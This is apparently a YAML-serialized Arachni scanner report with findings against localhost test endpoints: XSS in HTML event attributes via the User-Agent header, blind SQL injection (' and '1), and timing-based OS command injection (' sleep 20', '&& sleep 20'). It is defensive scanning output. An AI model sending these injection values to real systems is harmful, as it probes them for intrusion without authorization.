      :id: <a href="/" onmouseover="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseover=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseover</a><a href='/' onmouseover="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseover</a><a href='/' onmouseover='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseover</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onmouseover
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/onmouseup
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "436"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseup="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/onmouseup
      :id: <a href="/" onmouseup="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseup=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseup</a><a href='/' onmouseup="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseup</a><a href='/' onmouseup='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/onmouseup
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: header
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/header/src
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "400"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" src="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
    injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        User-Agent: arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/header/src
      :id: <a href="/" src="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' src=arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>src</a><a href='/' src="arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">src</a><a href='/' src='arachni_user;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>src</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/header/src
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
  elem: form
  internal_modname: BlindrDiffSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (rDiff) SQL Injection
  name: Blind SQL Injection
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - rdiff
  - injection
  - database
  url: http://localhost:6291/form/append?input=default'+and+'1
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "31"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "' and '1"
    injected: "' and '1"
    internal_modname: BlindrDiffSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (rDiff) SQL Injection
    name: Blind SQL Injection
    opts: 
      :var: input
      :opts: 
        :injected_orig: "' and '1"
        :combo: 
          input: default' and '1
      :injected: "' and '1"
      :id: "' and '1"
      :elem: form
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: "1 item found: Blah blah blah..."
    severity: High
    tags: 
    - sql
    - blind
    - rdiff
    - injection
    - database
    url: http://localhost:6291/form/append?input=default'+and+'1
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
  elem: link
  internal_modname: BlindrDiffSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (rDiff) SQL Injection
  name: Blind SQL Injection
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - rdiff
  - injection
  - database
  url: http://localhost:6291/link/append?input=default'+and+'1
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "31"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "' and '1"
    injected: "' and '1"
    internal_modname: BlindrDiffSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (rDiff) SQL Injection
    name: Blind SQL Injection
    opts: 
      :var: input
      :opts: 
        :injected_orig: "' and '1"
        :combo: 
          input: default' and '1
      :injected: "' and '1"
      :id: "' and '1"
      :elem: link
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: "1 item found: Blah blah blah..."
    severity: High
    tags: 
    - sql
    - blind
    - rdiff
    - injection
    - database
    url: http://localhost:6291/link/append?input=default'+and+'1
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "89"
  cwe_url: http://cwe.mitre.org/data/definitions/89.html
  description: |-
    SQL code can be injected into the web application
        even though it may not be obvious due to suppression of error messages.
  elem: cookie
  internal_modname: BlindrDiffSQLInjection
  metasploitable: unix/webapp/arachni_sqlmap
  method: GET
  mod_name: Blind (rDiff) SQL Injection
  name: Blind SQL Injection
  references: 
    OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
    MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
  remedy_code: ""
  remedy_guidance: |-
    Suppression of error messages leads to
        security through obscurity which is not a good practise.
        The web application needs to enforce stronger validation
        on user inputs.
  severity: High
  tags: 
  - sql
  - blind
  - rdiff
  - injection
  - database
  url: http://localhost:6291/cookie/append
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "89"
    cwe_url: http://cwe.mitre.org/data/definitions/89.html
    description: |-
      SQL code can be injected into the web application
          even though it may not be obvious due to suppression of error messages.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=default'+and+'1
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "31"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "' and '1"
    injected: "' and '1"
    internal_modname: BlindrDiffSQLInjection
    metasploitable: unix/webapp/arachni_sqlmap
    method: GET
    mod_name: Blind (rDiff) SQL Injection
    name: Blind SQL Injection
    opts: 
      :var: cookie
      :opts: 
        :injected_orig: "' and '1"
        :combo: 
          cookie: default' and '1
      :injected: "' and '1"
      :id: "' and '1"
      :elem: cookie
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
      MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      Suppression of error messages leads to
          security through obscurity which is not a good practise.
          The web application needs to enforce stronger validation
          on user inputs.
    response: "1 item found: Blah blah blah..."
    severity: High
    tags: 
    - sql
    - blind
    - rdiff
    - injection
    - database
    url: http://localhost:6291/cookie/append
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: POST
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/linux/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: POST
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: form
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/linux/form/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/linux/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/linux/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: link
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/linux/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/linux/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/linux/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=+sleep+20
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: " sleep 20"
      :injected: " sleep 20"
      :combo: 
        cookie: " sleep 20"
      :action: http://localhost:11226/linux/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/linux/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/linux/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "&& sleep 20"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "&& sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: "&& sleep __TIME__"
      :skip_orig: true
      :injected_orig: "&& sleep 20"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: "&& sleep 20"
      :injected: "&& sleep 20"
      :combo: 
        User-Agent: "&& sleep 20"
      :action: http://localhost:11226/linux/header/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/linux/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: OSCmdInjectionTiming
  metasploitable: unix/webapp/arachni_exec
  method: POST
  mod_name: OS command injection (timing)
  name: Operating system command injection (timing attack)
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - timing
  - blind
  url: http://localhost:11226/bsd/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands even though it does not return
          the command output in the HTML body.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " sleep 20"
    internal_modname: OSCmdInjectionTiming
    metasploitable: unix/webapp/arachni_exec
    method: POST
    mod_name: OS command injection (timing)
    name: Operating system command injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 14000.0
      :timeout_divider: 1000
      :timing_string: " sleep __TIME__"
      :skip_orig: true
      :injected_orig: " sleep 20"
      :altered: input
      :element: form
      :params: 
        input: " sleep 20"
      :follow_location: true
      :injected: " sleep 20"
      :combo: 
        input: " sleep 20"
      :action: http://localhost:11226/bsd/form/straight
      :silent: true
      :regexp: ""
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: ""
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - timing
    - blind
    url: http://localhost:11226/bsd/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands even though it does not return
        the command output in the HTML body.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
